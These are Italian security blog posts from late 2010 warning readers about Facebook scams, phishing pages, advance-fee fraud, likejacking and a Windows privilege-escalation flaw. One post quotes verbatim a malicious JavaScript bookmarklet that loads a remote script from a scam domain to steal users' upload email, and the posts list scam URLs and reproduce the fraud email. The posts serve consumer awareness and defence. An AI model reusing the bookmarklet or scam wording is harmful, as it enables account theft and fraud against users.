martedì 30 novembre 2010

Scam su Facebook per rubare la email di caricamento mobile

F-Secure, leader globale nell'offerta di soluzioni di sicurezza informatica, ha individuato una nuova ondata di short Url fraudolenti che da Facebook riportano a siti esterni. La nuova truffa si sta diffondendo tramite Facebook attraverso l'uso di frammenti di codice javascript, che gli utenti sono invitati ad inserire nel browser di navigazione, per ottenere le immagini girevoli su Facebook.


Oggi, gli utenti di Internet trascorrono più tempo sui social network di quanto non ne dedichino alle email. Gli spammer lo sanno e hanno adottato alcuni metodi per agire di conseguenza. Facebook ha recentemente preso provvedimenti per eliminare lo spam, tra cui azioni legali nei confronti di presunti spammer e miglioramenti al sito, come la possibilità di segnalare lo spam e il filtro antispam per le pagine aziendali, ma questi strumenti sembrano essere ancora insufficienti nella lotta contro lo spam. Entrati su Facebook, infatti, ed utilizzando il termine di ricerca "omg http://" visualizziamo un elenco di post degli utenti:


Il procedimento per truffare l'utente è relativamente semplice. Gli utenti sono invitati ad inserire nel browser di navigazione un codice javascript, per ottenere delle immagini girevoli su Facebook. Tutto quello che bisogna fare è copiare ed incollare il seguente pezzo di codice JavaScript
"javascript:(a = (b = document).createElement("script")).src = "//imagemajic.info/majic.js?show", b.body.appendChild(a); void(0)"
nel browser. Mentre si ricevono delle immagini a caso girevoli dei propri amici, in sottofondo la sceneggiatura va a rilevare la vostra "Email Address Upload", cioè la vostra email di caricamento personalizzata, utilizzata per pubblicare aggiornamenti di stato o inviare foto e video al vostro profilo.


Anche se il danno è ancora limitato, Aditya Punjani, uno sviluppatore, ha illustrato il codice che dimostra come il nuovo exploit è in grado di produrre danni maggiori. Mentre questa truffa non sembra generare degli enormi danni, limitandosi agli aggiornamenti di status degli utenti, questa potrebbe evolversi nel tempo in una truffa ben più grande. Facebook stesso raccomanda di non condividere la email personalizzata con altri, inoltre ricordate che le foto e i video caricati via e-mail sono visibili a tutti per impostazione predefinita. In questo momento la truffa si propaga attraverso i seguenti siti:
http://revolvingimages.info/fb/, http://kewlpics.tk/, http://itsmajic.tk/


Offrendo alle persone uno strumento semplice per restare in contatto con parenti e amici, Facebook è diventato rapidamente il più importante social network al mondo. Proporzionalmente è cresciuto lo spam sui social network. Gli short Url sono stati già in passato utilizzati per campagne di spam, che vengono condivisi istantaneamente con tutti gli amici. Staremo a vedere come si evolverà questa nuova truffa. Nel frattempo assicuratevi di non fare clic su uno degli short Url che offrono le "immagini di Facebook girevoli" e prestate attenzione ai codici Javascript che vi vengono proposti, per ottenere funzionalità nascoste o particolari su Facebook.

Facebook sfruttato per nuovi e più sofisticati attacchi di phishing

La scorsa settimana alcuni cracker hanno lanciato un attacco contro gli utenti di Facebook, rubando password ad alcuni dei 500 milioni di iscritti al social network. In particolare i Security Labs di Websense hanno rilevato che Facebook viene sfruttato per visualizzare pagine phishing e per reindirizzare ad altre pagine malevole situate su altri server.


Solitamente le tecniche per quanto riguarda l'aspetto grafico si limitano all'andare sul sito di cui si vuole realizzare la copia truccata, selezionarne il sorgente, copiarlo in una pagina html e al posto dei link di login standard andargli a sostituire link ad azioni di login su uno script (di solito in php) che si copia da qualche parte (in un file di testo) i dati immessi nel form. Di seguito vengono riportati due esempi di tentativi di phishing attraverso false email che sembrano provenire da Facebook Security. Il primo messaggio chiede agli utenti di confermare il proprio account:

http://www.websense.com/

Questo è molto simile agli altri attacchi di phishing rilevati ogni giorno, ma in realtà la pagina malevola è caricata all’interno del sito Facebook, utilizzando un iframe. Il tag iframe consente agli sviluppatori di inserire frame all'interno della pagina come se si trattasse di oggetti qualsiasi. In altri termini, i frame in linea non devono necessariamente essere inseriti ai bordi della pagina (come per i frame tradizionali) ma in qualsiasi punto del documento. Questo metodo fa sembrare il messaggio maggiormente legittimo rispetto ad un sito ospitato su un altro dominio.

http://www.websense.com/
Il secondo messaggio è simile, ma è presente un secondo URL alla fine. Cliccando il link l’utente accede al sito www.facebook.com dove però viene reindirizzato ad un altro sito Web che contiene una pagina phishing. Queste due tipologie di attacco rendono più difficile individuare il contenuto malevolo direttamente dall’email. Entrambi i messaggi fanno, infatti, riferimento ad un URL di Facebook valido. Inoltre, l’inserimento di URL validi di Facebook rende più difficile la protezione degli utenti attraverso soluzioni anti-spam e Web filtering che si basano sull’analisi dell’URL per classificare i contenuti. Di seguito un video di approfondimento:



A quanto pare, dalle nostre verifiche, uno degli URL non è più funzionante ma questo non prescinde dal fatto che bisogna alzare la soglia d'attenzione, in quanto i link presenti nelle false email - come è chiaramente mostrato - presentano come parte iniziale dell'indirizzo www.facebook.com, dunque anche un utente più smaliziato potrebbe essere tratto in inganno. Websense, Inc. è una società leader mondiale nelle soluzioni integrate per la sicurezza Web, sicurezza dei dati e la sicurezza email. Websense nasce come un’azienda produttrice di soluzioni per il Web filtering per poi estendere e potenziare i suoi punti di forza attraverso l’individuazione e la classificazione dei contenuti, funzioni ora integrate nell’intera gamma dei suoi prodotti. Per ulteriori informazioni sulla società andate al Profilo Aziendale.

domenica 28 novembre 2010

Malware raddoppiato dal 2009 ad oggi, grazie anche ai social network

L'aggiornamento Q3 Dasient continua a monitorare milioni di siti su Internet che presentano infezioni malware web-based e malvertisements. Sulla base dei dati raccolti, si stima che nel 3° trimestre oltre 1,2 milioni di siti Web su Internet sono stati infettati, che è il doppio di ciò che era stato stimato esattamente un anno fa. Il problema del malware web continua a crescere drammaticamente il numero di siti legittimi infettati.

Guardando alle principali modalità di comunicazione utilizzate in Internet, l'e-mail risulta una dei principali metodi di comunicazione, e abbiamo visto che gli aggressori ne approfittano per distribuire virus attraverso allegati email. Nel tempo, la posta elettronica è diventata il web-based dei servizi come Hotmail, Yahoo Mail e Gmail, servizi che devono incorporare un software anti-virus sui loro server per la scansione degli allegati malware delle e-mail. Come le visualizzazioni di pagine web continuano ad aumentare e diventano sempre più interattive attraverso il Web 2.0, così i cybercriminali hanno approfittato dell'avvento delle tecniche drive-by-download per infettare gli utenti senza richiedere l'apertura di allegati, consentendo loro di sfruttare le pagine web come una piattaforma di distribuzione di malware sempre più pervasiva. Mentre gli aggressori continuano a crescere l'uso di quasi tutti gli strumenti a loro disposizione (compresi i virus diffusi tramite allegato e-mail) e come l'economia criminale continua a prosperare, la ricerca di Dasient indica che l'uso di drive-by-download e rogue antivirus usano schemi sempre più evoluti per la distribuzione di malware. Mentre ci avviciniamo al 2011, si prevede che l'uso specifico di siti di social media web continua a crescere, drive-by-download e falsi programma anti-virus saranno utilizzati in maniera più aggressiva su piattaforme come Facebook e Twitter, come evidenziato dalle minacce come il botnet Koobface.


Le botnet hanno avuto continuamente come obiettivo Facebook e gli attacchi XSS di settembre hanno avuto come scopo indirizzare gli utenti di Twitter e a siti porno e siti di malware. Gli autori di Koobface, ad esempio, hanno costruito "moduli di attacco" per diverse reti sociali come Facebook, MySpace, Twitter, Hi5, Bebo, Friendster. Questi moduli vengono utilizzati per attaccare attraverso post automatici spam nei commenti con link pericolosi e distribuire falso software anti-virus per gli utenti di ciascuno dei diversi media social network. Una minaccia interessante per i governi questo trimestre è stato Stuxnet, un trojan di alto profilo molto e molto sofisticato che si pensa essere stato scritto contro uno Stato-nazione. Stuxnet ha la capacità di riprogrammare l'apparecchiatura di automazione che controlla e monitora le infrastrutture critiche, e ha la capacità di condurre il sabotaggio con un impatto che è ancora da determinare. Stuxnet è stato scritto con l'obiettivo di colpire lo stabilimento Siemens Simatic, e si sospetta sia stato scritto per colpire i reattori nucleari in Iran. Nel 3° trimestre 2010, si stima che oltre 1,5 milioni di malvertisements al giorno sono stati serviti online, compresi i drive-by-download e le false campagne anti-virus. Inoltre, i sistemi di misura di Dasient hanno stimato che la vita media di una campagna Malvertising è stata di 11,1 giorni, indicando che il malvertisments continuare ad essere un mezzo estremamente efficace per la diffusione di malware da parte dei cybercriminali.


In Q3, i sistemi di rilevazione hanno riferito che gli aggressori provenivano maggiormente da domini popolari quali .Com, .Ru e .Info, in ordine decrescente di popolarità. Rispetto al trimestre scorso, ci sono stati alcuni spostamenti per l'origine degli attacchi basati sul TLD del codice attaccante: abbiamo visto la caduta di .Cn (Cina) e l'avanzata di .Ru (Russia). Gli autori di malware continuano a distribuire gli attacchi sempre più sofisticati per eludere i rilevamenti. Essi sanno che si tenta di eseguire il malware su macchine virtuali come VMware e Parallels. Come tale, gli autori di malware programmano il loro malware in maniera tale da fare controlli run-time per determinare se esso potrebbe essere sotto analisi da ricercatori di sicurezza o motori di scansione automatizzati. Per esempio, per verificare o meno se il malware potrebbe essere sotto controllo in una macchina virtuale VMware, vengono effettuati controlli malware per determinare se un file con il nome di vmhgfs.sys è presente come driver di periferica nella directory di sistema di Windows. Oppure, per verificare se il malware viene analizzato in Parallels, controlla un driver di periferica con il nome di prleth.sys. Altri meccanismi di rilevazione anti-range verificano l'esecuzione di processi e moduli caricati al sistema di verifica delle informazioni sul BIOS e contando il numero di cicli di CPU per eseguire blocchi di codice. Il forte aumento dei siti di social network espande solo il panorama delle minacce e la corretta protezione di sicurezza web diventa un must.

Phishing: falso messaggio minaccia la disattivazione dell'account Facebook


E' stato segnalato un nuovo tentativo di phishing su larga scala ed indirizzato agli utenti del social network Facebook, attraverso un falso messaggio proveniente da un sedicente team di Facebook, dove si viene avvertiti circa il presunto uso improprio dell'account, che potrebbe causarne la sospensione o disattivazione a causa della violazione dei Diritti e delle Responsabilità di Facebook. Il messaggio invita l'utente a cliccare su uno short url (camuffando così il link intero e rendendolo dunque più credibile) entro 24 ore dalla ricezione dello stesso, pena la disattivazione automatica e definitiva dell'account. Il link riporta ad un sito esterno che ripropone la veste grafica della pagina Facebook di verifica degli account danneggiati o violati.


«E' stata rilevata un'attività sospetta nel tuo account Facebook, che è stato temporaneamente sospeso come misura di precauzione. Il tuo account potrebbe essere stato danneggiato poichè hai immesso la tua password in un sito creato per assomigliare a Facebook, che ti ha invece "rubato" la password. Questo tipo di frode è chiamato phishing». Questo è ciò che leggiamo sulla pagina ufficiale di verifica dell'account Facebook ed ecco come si presenta


Di seguito ciò che leggiamo sul primo passaggio della pagina falsa: «Il tuo account e stato temporaneamente sospeso. Inserisci i tuoi dati in modo corretto, per confermare l'account che consente di utilizzare nuovamente l'account. Per confermare attivazione del vostro account, inserisci il risultato qui sotto». Ed ecco come si presenta la pagina di phishing (da notare che qui i passaggi sono 3 e non 6 come su quella ufficiale)


Il sito di phishing presenta una pagina index dove sono contenute le pagine corrispondenti ai 3 passaggi illustrati. Sulla seconda pagina leggiamo: «Invia il Tuo Arrivo. Inserisci i tuoi dati in modo corretto, e vi invieremo una conferma alla vostra posta. "ATTENZIONE" Inserisci la tua Email Inserisci la tua password Email Esamineremo la vostra considerazione quando si inseriscono i dati corretti». Quindi, oltre a tentare di sottrarre i dati di login dell'account Facebook, il phisher cerca di estorcere anche i dati di accesso alla casella email del malcapitato.


Nella terza ed ultima, a completamento del processo, si rassicura l'utente che l'account è stato riattivato e, come abbiamo visto in altri casi di phishing, per rendere ancor più credibile la procedura si raccomanda di scaricare soltanto da siti di fiducia e di mantenere aggiornato il proprio software di sicurezza, nonchè si viene invitati (attraverso un collegamento ipertestuale) a visitare la pagina ufficiale di Facebook Security. Se abbiamo effettuato tutti i passaggi, avremo consegnato i nostri dati di accesso all'account Facebook e alla casella email in mano al phisher. Ricordiamo che Facebook non comunica con l'utente attraverso posta interna ma, eventualmente, con avvisi diretti sulla home page. Il nostro consiglio è quello di prestare la massima attenzione e di verificare, eventualmente, l'URL del sito che si sta visitando. Se presenta l'aspetto di Facebook, controllate sempre che l'indirizzo del browser inizi con http://www.facebook.com, in modo da esser certi che si è sul vero sito di Facebook.

sabato 27 novembre 2010

Facebook annuncia controllo 'dove necessario' per il servizio di messaggistica

Dopo le recenti critiche sul nuovo sistema di messaggistica introdotto da Facebook, questa settimana, Facebook ha annunciato la prossima evoluzione dei messaggi. I nuovi messaggi permetteranno alle persone di comunicare velocemente e facilmente con i propri amici mediante qualsiasi mezzo o dispositivo conveniente per loro. 

Nei nuovi messaggi della piattaforma, Facebook ha dedicato molto tempo ed energia per mantenere fuori lo spam e le altre comunicazioni fastidiose o dannose. Ma soprattutto, Facebook verificherà i vostri messaggi tra connessioni sociali per assicurare che la posta in arrivo contenga solo i messaggi dai vostri amici e i loro amici per impostazione predefinita. Ogni messaggio da un indirizzo e-mail o da qualcuno con cui non avete alcun legame sociale su Facebook viene automaticamente e distintamente filtrato nella cartella "Altro". Inoltre, a differenza di altri sistemi di messaggistica in cui non si ha controllo una volta che qualcuno sa come arrivare a voi, su Facebook, potrete determinare chi può inviare messaggi attraverso l'impostazione della privacy per "l'invio di messaggi". Riceverete solo i messaggi delle persone che cadono all'interno del setting scelto. Ad esempio, se si seleziona l'opzione "Amici di amici" per  impostazione, i messaggi provenienti da indirizzi email che Facebook non può determinare appartenere ad un amico o un amico di un amico non verranno a voi consegnati. Invece, il mittente riceverà una risposta automatica bounce-back. Facebook ha completato i controlli di sicurezza per rendere personalizzabile e robusta la mail da spam e virus, tra cui la  scansione degli allegati. Facebook sta anche approfittando dei suoi numerosi mezzi di protezione tecnica per combattere lo spam e altre minacce alla sicurezza. Questi comprendono i sistemi che lavorano dietro le quinte per rilevare e contrassegnare i messaggi sospetti sulla base dell'attività anomale.


Tra gli algoritmi uitilizzati vi sono quelli che calcolano un numeroso invio di messaggi in un breve periodo di tempo o messaggi con i link che risultano notoriamente nocivi. Una volta che si individua un messaggio falso, Facebook ne blocca l'invio. Si avvertirà inoltre il destinatario che saranno cancellati sollecitamente tutti i suoi collegamenti attraverso il sito. Nei rari casi in cui è compromesso l'account di una persona e usato per inviare spam, si disattiva automaticamente l'accesso all'account e si permetterà al proprietario dell'account di effettuare un processo di bonifica in modo che lui o lei possano rapidamente reimpostare la password e adottare altre misure necessarie per garantire l'account. Facebook non può combattere gli spammer e i truffatori da solo. Facebook ha bisogno del vostro aiuto. Seguite i suggerimenti su questa pagina, e controllate gli strumenti che il social network fornisce per aiutarvi a controllare il vostro account e gli accessi. La funzionalità delle notifiche di login vi permette di approvare i dispositivi e il nome che utilizzate per accedere a Facebook ed essere informati immediatamente se l'accesso al vostro account avviene da un dispositivo non approvato. La funzione di controllo delle sessioni vi permette di visualizzare tutte le sessioni attive di Facebook e chiudere quaelle che non avete autorizzato o non si vogliono più tenere attive, il tutto da una posizione centrale nel vostro account. Facebook lancerà la nuova messaggistica gradualmente e rendendola accessibile a tutti nei prossimi mesi. Una volta che si riceve un invito, sarete in grado di iniziare e invitare i vostri amici ad unirsi a voi.

Il 20% delle bacheche degli utenti di Facebook a rischio malware

La nuova applicazione in Beta, sviluppata per portare la tutela della privacy e la sicurezza degli utenti a un livello superiore rispetto alle impostazioni fornite dal popolare network Facebook®, da qualche giorno è disponibile anche in versione Italiana.


Se per milioni di utenti Facebook® è uno spazio dove rilassarsi, socializzare, giocare o condividere immagini e video, per chi “va a pesca” di dati personali, dissemina esche per lo spam o diffonde link a file infetti rappresenta l’equivalente di una stazione affollata per un borseggiatore. Concepito per essere utilizzato su diversi social network, da oggi BitDefender Safego allarga la fase di BETA testing su Facebook® rendendo disponibile l’interfaccia in Italiano. Le statistiche relative alla prima fase beta, hanno accellerato il processo di localizzazione dell’interfaccia: quasi il 20% dei link oggetto di scansione si è rilevato a rischio malware. L'Italia è uno dei Paesi in cui si registra il maggior numero di installazioni dell'applicazione, con Roma che si posiziona al quinto posto nel mondo tra le città in cui è più utilizzata. BitDefender Safego ha catturato l'attenzione di un'utenza italiana prevalentemente maschile (79%), concentrata nella fascia età 25-34 anni (24%), seguita da quella 18-24 anni (19%) e quella 35-44 anni (17%). “E’ chiaro che un gran numero di persone non ha la percezione di quante informazioni personali condivida con il mondo. Safego rende semplice verificare cosa si condivide e apportare le opportune modifiche,” dichiara Catalin Cosoi, Responsabile del BitDefender Online Threat Lab. ”Va detto, inoltre, che stiamo assistendo a un’impennata degli attacchi nei confronti degli utenti Facebook. Attraverso l’impiego dell'avanzata tecnologia di rilevamento BitDefender, Safego aiuta a proteggere gli utenti da link malevoli e da altre minacce che si diffondono attraverso messaggi, post e video.”


Attraverso un’interfaccia semplice e intuitiva, BitDefender Safego tiene sotto controllo il livello di privacy dell’utente identificando le informazioni personali che sono visibili a occhi estranei. Inoltre, Safego analizza la bacheca dell’utente, i messaggi pervenuti nella casella inbox e i commenti a caccia di link, video o immagini potenzialmente dannosi. Installando Safego, l’utente potrà contare su:

• una migliore protezione della privacy, dato che l’applicazione provvederà ad avvisarlo qualora sia necessario modificare le impostazioni di Facebook per evitare che le informazioni personali restino alla mercé di chiunque;
• scansione automatica, che si attiva semplicemente cliccando sul bottone “Scan Now” e restituisce una schermata sullo stato della sicurezza;
• protezione costante dell'account, operativa anche quando l’utente non è loggato a Facebook®o ad altri social network;
• protezione estesa agli amici, grazie alla possibilità di avvisare i propri contatti sulla presenza di link infetti nei loro account.

BitDefender è creatore di una delle linee di prodotti software per la sicurezza informatica più veloci, efficaci e certificate internazionalmente. Sin dal 2001, BitDefender ha aumentato e stabilito nuovi standard nella protezione proattiva delle minacce. Ogni giorno, BitDefender protegge decine di milioni di utenti privati e aziende in tutto il mondo, assicurando loro un’esperienza digitale senza problemi. Le soluzioni Antivirus BitDefender sono distribuite da un network globale di partner, distributori e rivenditori a valore aggiunto in più di 100 paesi nel mondo. Più informazioni sono disponibili sul nostro sito. Inoltre, il sito di BitDefender www.malwarecity.com consente agli utenti, gratuitamente, di rimanere aggiornati e combattare le minacce quotidiane provenienti dal malware. Per ulteriori informazioni su Safego BitDefender, potete visitare la fanpage all’indirizzo http://apps.facebook.com/bd-safego/. Per maggiori informazioni sulla tecnologia BitDefender, vi invitiamo a visitare www.bitdefender.it.

venerdì 26 novembre 2010

Falsi profili Facebook contattano l'utente per estorcere dati personali


Dopo l'ondata di email phishing dei giorni scorsi, alcuni spammer stanno inviando false mail su Facebook definite "spoofing", per raccogliere informazioni personali. Lo spoofing, di fatto, non è una novità, ma è un pericolo nato dall'evoluzione della rete Internet stessa. L'e-mail spoofing può consistere in diverse forme, ma tutte hanno un obiettivo: truffare l'ignaro utente. L'e-mail spoofing è spesso un tentativo di ingannare l'utente facendogli fare una dichiarazione che lo possa danneggiare o divulgare informazioni riservate. E nelle ultime ore molti utenti di Facebook stanno vedendosi recapitare nella proprie caselle di posta elettronica, un messaggio proveniente da un tale Benjamin Dabrah e che ha come oggetto una richiesta d'aiuto per recuperare un presunto conto in sospeso. Naturalmente è una falsa richiesta. Si tratta d'una delle più classiche truffe che arrivano generalmente nelle caselle di posta elettronica sotto varie forme.


Ecco cosa leggiamo nella mail appena ricevuta:

am Mr.Benjamin Dabrah the managing director of Barclays bank Ghana ltd, a citizen of Ghana.

I have the information to the existence of an abandoned big sum of money in my bank belonging to a late customers Peter ********* who happen to have the same surname as yours .The fund is now without any claim because Mr.Peter died in a deadly earthquake in China.

The process will be of great mutual assistance to us . So i need your corporation to get the money transferred from my bank to your country. Simply send me your reply of interest so that I will give you the details.

Please strictly reply me through my private address:

benjamindabrah****@****.com then I will explain in details what my proposal is all about.


Che tradotto:

Ho le informazioni per l'esistenza di una grande somma di denaro abbandonata nella mia banca appartenente ad un cliente Pietro ********* che capita avere lo stesso vostro cognome. Il fondo è ora senza alcuna pretesa perché Mr.Peter morì in un terremoto mortale in Cina.

Il procedimento sarà di grande aiuto per noi. Quindi ho bisogno di voi per ottenere il denaro e trasferirlo dalla mia banca alvostro Paese. Semplicemente mi inviate la vostra risposta se interessato in modo che io vi fornirò i dettagli.

Per favore rispondetemi rigorosamente tramite il mio indirizzo privato:

benjamindabrah****@****.com poi spiegherò in dettaglio la mia risposta.

Inizialmente i truffatori utilizzano messaggi di posta su Facebook per adescare le loro vittime e diversi sono gli approcci utilizzati per poter truffare principalmente persone inesperte e poco attente ai pericoli della rete. In questo caso si dice che il conto dormiente d'un presunto defunto ha lo stesso cognome (casualmente) del vostro profilo. Anni fa accadeva di ricevere una mail in cui uno sconosciuto si presentava dichiarando di essere un ricco abitante (di un paese prevalentemente africano), che doveva far uscire dal proprio paese una cospicua somma di denaro e, a tal fine, aveva bisogno di un prestanome in cambio di un’alta percentuale di questo bottino. Molti purtroppo sono caduti nell’inganno inviando in anticipo somme che sarebbero servite teoricamente a pagare spese notarili ma che poi alla fine risultavano proprio il vero scopo della truffa e cioè il furto sia di denaro che di dati sensibili. Questo è sostanzialmente il funzionamento della truffa, diffidate degli account esteri che vi chiedono di anticipare soldi oppure merce, mai divulgare dati personali e diffidate di chi vi contatta da altri paesi extra-europei. Contrassegnate il messaggio ricevuto come spam e segnalate il profilo come falso. Inoltre siate sempre cauti nell'accettare richieste d'amicizie da parte di sconosciuti.

giovedì 25 novembre 2010

Rischio furto d'identità col nuovo sistema di messaggistica di Facebook

Il nuovo servizio di messaggistica on line di facebook rende gli utenti piu' vulnerabili al furto di identita' da parte dei pirati informatici. E' l'allarme lanciato dalla societa' di sicurezza informatica Sophos. "Questi nuovi sistemi aumentano la superficie vulnerabile sulla piattaforma di facebook"ha avvertito il consulente per la tecnologia Graham Cluley. "Gli utenti devono sapere che facebook memorizzera' in un archivio tutte le loro comunicazioni..."

Facebook riunisce l'e-mail tradizionale, i messaggi di Facebook, chat chat e SMS tutto in un unico luogo. Gli iscritti al socila network avranno la possibilità di ottenere un indirizzo email an@facebook.com. Ci vorranno alcuni mesi Facebook per estendere progressivamente il servizio per tutti i suoi utenti, comunque. Non sarà proprio un'altra forma di e-mail. In realtà è più simile all'invio di un SMS o un messaggio istantaneo. I messaggi non avranno linee tematiche, per esempio. Inoltre, Facebook dice che memorizzerà la cronologia completa di tutte le comunicazioni con una persona. Chi ha già scelto un nome utente pubblico su Facebook (per esempio, facebook.com / publicusername), allora sarà anche il vostro indirizzo e-mail  (publicusername@facebook.com). Dato che il nome utente è pubblico, significa che chiunque potrà trovare il vostro indirizzo e-mail di Facebook. Qualsiasi utente sarà in grado di elaborare il vostro indirizzo e-mail Facebook e inviare un messaggio. Sarà necessario modificare le impostazioni di privacy di default per bloccare i messaggi provenienti da indirizzi sconosciuti.

http://nakedsecurity.sophos.com/
Bisognerà scegliere l'opzione "Solo amici" nelle impostazioni sulla privacy per garantire che solo i vostri amici su Facebook potranno inviarvi un messaggio. Le email degli amici e dei loro amici andranno direttamente nella cartella principale dei messaggi, e tutto il resto andrà nella cartella "Altro". Facebook dice che lo spam e-mail di massa passerà automaticamente nella cartella "Altro", ma resta da vedere quanto sarà efficace. Inoltre, non dicono in che modo affronteranno lo spam e il malware inviato da account appartenenti ai vostri amici di Facebook - che è diventato un problema significativo nell'ultimo anno. Le nuove caratteristiche faranno aumentare la superficie di attacco della piattaforma Facebook, e renderà ancora più allettante per i cybercriminali penetrare negli acccount degli utenti. L'account di Facebook sarà ora collegato con molte più persone nella vostra cerchia sociale - aprendo nuove opportunità per i frodatori d'identità per lanciare attacchi. Inoltre, poiché Facebook avrà la memorizzazione di un archivio completo di tutte le comunicazioni con una persona - non conosciamo come tali dati potranno essere abusati se dovessero cadere nelle mani sbagliate.

http://nakedsecurity.sophos.com/
Sarà fondamentale per Facebook implementare meccanismi di filtraggio più efficaci per prevenire  truffe e attacchi di phishing agli utenti di Facebook, vittime di spam e manipolati da truffatori. Per esempio, il nuovo sistema di messaggistica permette agli utenti di inviare non solo link, foto e video tra loro - ma anche i file esterni, quali documenti e fogli di calcolo. Questi potrebbero essere infetti o portare messaggi di spam. Non è chiaro al momento se Facebook metterà le restrizioni sui tipi di file che possono essere allegati ai messaggi. Nel frattempo, gli utenti dovranno prestare maggiore attenzione alla sicurezza del proprio account Facebook più che mai. Mantenere la sicurezza aggiornata sui computer e scegliere password affidabili ed uniche, sarà essenziale per difendersi dal crack. Gli utenti di Facebook non devono ingannarsi ed aver fiducia, credendo che essi sono al sicuro fintantochè riceveranno messaggi inviati dai loro amici di Facebook, in quanto tali account possono ancora essere compromessi da hacker malintenzionati. Non sarà obbligo usare la mail, ma Facebook punta a rendere molto di più difficile smettere l'uso del social network in futuro. Questo, senza dubbio, fa parte della strategia di Facebook.

Spam: "Guardate cosa succede a questa ragazza mentre si spoglia in cam!"


Ritornano puntualmente le pagine che prometto video incredibili o sconvolgenti e che utilizzano il protocollo opengraph. L'ultima che abbiamo individuato ha come titolo "Guardate cosa succede a questa ragazza mentre si spoglia in cam!". Come al solito la propagazione virale attraverso Facebook, avviene tramite i post condivisi sulla bacheca degli amici e tutte le nostre continue raccomandazioni vengono puntalmente ignorate da gran parte degli utenti. La pagina promette, a suo dire, la visione d'un video sconvolgente dove il padre d'una ragazza dovrebbe cogliere sul fatto la propria figlia mentre si spoglia d'innanzi alla webcam.

L'utente di Facebook, ingenuamente viene attirato nella trappola perchè vedrà condiviso sulla bacheca d'un amico il post generato dalla pagina e sarà indotto a cliccare sul link. In questo modo verrà reindirizzato ad una pagina esterna al social network, che riproduce un sito simile ad YouTube dove, per poter caricare il video, viene richiesta la condivisione del post sulla propria bacheca del post. In questo modo, oltre alla condivisione, verrà espresso il proprio piacimento (like). Si tratta del likejacking, cioè il trucco col quale vengono indotti gli utenti di Facebook a cliccare su "mi piace" tramite il pulsante like, che può essere nascosto dietro un'immagine o un pulsante con altro nome.

Sulla pagina è presente un falso pulsante dislike (non mi piace), simile a quello che troviamo sulle pagine di YouTube, ma che in effetti, come'era prevedibile, non è funzionante. Dopo aver fatto ciò e dunque mostrato agli amici che piace questa pagina, si aprirà successivamente una pagina dove il video risulta bloccato. A questo punto, per poter visualizzare il tanto agognato video del padre che becca la figlia mentre si spoglia in cam, bisogna inserire la propria mail e successivamente confermarla. Sulla pagina, inoltre, per invogliare ulteriormente l'utente, viene presentata una serie di premi che si potranno vincere nel caso in cui inseriremo la nostra mail, tra i quali un ipack (contenitore in cellulosa o errore d'ortografia?!).


Naturalmente non vedrete alcun video, ma in compenso avrete fatto il gioco dello spammer e cioè aumentare il numero di iscritti alla pagina e invogliando un vostro amico ad effettuare la medesima operazione che avete condotto voi. Inoltre è assicurata la ricezione nella vostra casella email di posta indesiderata o spam. Questa pagina fà parte d'un circuito ben più vasto di altre pagine simili e che ruotano sempre intorno ad argomenti simili, che hanno come oggetto qualche scandalo. Per rimuovervi dalla pagina, loggati su Facebook, recatevi alla pagina degli interessi e preferenze, rimuovete la vostra iscrizione e confermate il salvataggio delle nuove impostazioni. Non dimenticate inoltre di rimuovere il post dalla vostra bacheca.

Pericolosa falla 0-day minaccia tutte le versioni di Windows

È stata scoperta una vulnerabilità in Windows in grado di portare a degli attacchi 0-day verso gli utenti del sistema operativo di Microsoft. La falla è stata rilevata da Prevx e viene giudicata potenzialmente molto pericolosa, in quanto ad essere interessati sono praticamente tutti i sistemi operativi Windows, compresi anche i più recenti Windows 7 e Windows Vista.

La falla in questione consente ad un aggressore di eseguire un malware anche nelle versioni progettate per non essere vulnerabili a questo tipo di attacchi. I dettagli tecnici sono già stati pubblicati su vari forum cinesi, questo ovviamente non è un bene, in quanto spianerà la strada i malintenzionati che vorranno sfruttare quanto prima la falla di sicurezza a meno che Microsoft non rilasci con estrema celerità una patch straordinaria. La falla è stata definita da Prevx particolarmente seria perché interessa il file win32k.sys al quale fa capo il "kernel mode" di Windows. Della vulnerabilità è stato pubblicato online il proof of concept necessario a dimostrare come, sfruttando questa falla, eventuali cracker siano in grado di bypassare il Controllo Account Utente introdotto nelle ultime due versioni di Windows, riuscendo ad accedere al sistema con privilegi di amministratore e da lì, di conseguenza, avere il pieno controllo delle attività. In modalità kernel le applicazioni hanno piena libertà di accedere alla memoria, all'hardware ed a tutte le altre risorse disponibili sul sistema in uso.


Il ricercatore italiano della Prevx, Marco Giuliani ha affermato che l’exploit per la diffusione di eventuali malware verrà utilizzato molto presto in quanto si presenta come una ghiotta e facile opportunità da sfruttare per tutti i virus-writer. "L'API NtGdiEnableEUDC definita nel file win32k.sys non effettua una validazione corretta delle informazioni in ingresso, ha osservato Marco Giuliani, Malware Technology Specialist per Prevx. Sfruttando tale lacuna di sicurezza, un aggressore può modificare l'indirizzo di memoria restuito dalla funzione facendolo puntare al codice dannoso messo a punto. Così facendo, il malintenzionato può eseguire, sulla macchina Windows, una serie di istruzioni arbitrarie utilizzando la modalità kernel e, quindi, sfruttando i privilegi più elevati. Trattandosi di un exploit che consente di guadagnare diritti più elevati, l'attacco - come spiega Giuliani - "permette di bypassare tutte le protezioni implementate in Windows, comprese quelle integrate in Windows Vista ed in Windows 7".

http://www.exploit-db.com/

Sia il sistema di protezione UAC (User Account Control) che l'impiego di un account utente di tipo limitato riescono ad offrire una difesa a questa nuova aggressione che sembra andare a buon fine su qualsiasi versioni di Windows. "La buona notizia", aggiunge l'esperto di Prevx, "è che per il momento nessun malware sta facendo leva sulla vulnerabilità. La brutta notizia, di contro, è che il codice exploit è stato pubblicato online. Si tratta di una problematica che potrebbe ben presto divenire un vero e propro incubo. Riteniamo infatti che, con buona probabilità, gli autori di malware comincino molto presto a sfruttarla su larga scala". Da parte sua, nella giornata di ieri Microsoft aveva fatto sapere di essere al lavoro sul problema. Il Microsoft Security Response su Twitter aveva lasciato un cinguettio: "Stiamo indagando su PoC pubblico per un EOP vuln locale che richiede un account sul sistema di destinazione", anche se al momento la vulnerabilità rimane senza una patch mettendo a rischio la sicurezza di milioni di utenti.

mercoledì 24 novembre 2010

Falso sito di Poste italiane ed email phishing agli utenti Postepay


